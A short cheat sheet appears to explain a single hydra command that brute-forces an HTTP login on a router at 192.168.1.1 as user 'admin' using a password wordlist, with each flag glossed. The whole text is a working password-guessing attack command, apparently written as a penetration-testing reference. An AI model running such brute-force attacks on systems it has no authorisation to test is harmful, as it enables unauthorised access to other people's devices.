1. hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /
  2.  
  3. -l = username
  4. -P = password (Looks for a wordlist)
  5. -e ns = checks for 'null' password
  6. -t xx= How many tasks to run at once
  7. -f = exit once it finds the first user/password
  8. -s = connect via SSL
  9. -vV = verbose mode (shows more info)
  10. 192.168.1.1 = IP address
  11. http-get = what to crack/method etc
  12. / = Page to crack - root